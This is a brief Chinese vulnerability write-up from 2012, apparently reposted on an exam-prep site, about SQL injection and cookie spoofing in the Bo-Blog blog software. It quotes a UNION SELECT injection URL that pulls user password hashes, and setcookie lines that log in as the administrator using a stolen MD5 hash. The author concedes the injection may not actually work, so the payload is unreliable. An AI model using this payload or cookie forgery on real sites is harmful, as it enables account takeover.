boblog注入后COOKIE欺骗漏洞

2012-11-08

    影响版本:boblog最新
    官方网站:http://www.bo-blog.com//
    漏洞类型:COOKIE欺骗
    漏洞描述:
    代码
    index.php代码
    if ($go) @list($job, $itemid)=@explode('_', basename($go));
    原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
    也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
    更何况 存在注入漏洞的
    `category` in ({$all_needed_cates})");
    不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
    COOKIES欺骗漏洞很简单
    假如某牛真的注入成功得到MD5密码不用去跑MD5了
    直接
    setcookie ('userid', '1',);
    setcookie ('userpsw', 'md5密文', );
    既可了……

    考试大温馨提示:本内容来源于网络,仅代表作者个人观点,与本站立场无关,仅供您学习交流使用。其中可能有部分文章经过多次转载而造成文章内容缺失、错误或文章作者不详等问题,请您谅解。如有侵犯您的权利,请联系我们,本站会立即予以处理。

    相关推荐

    Windows8可能会是云端运行的操作系统?

    Windows7自带功能完成磁盘数据加密

    解决Windows7游戏花屏问题

分享到:
0
相关阅读
友情链接
© 2018 我考网 http://www.woexam.com 中国互联网举报中心 湘ICP备18023104号 京公网安备 11010802020116号
违法和不良信息举报:9447029@qq.com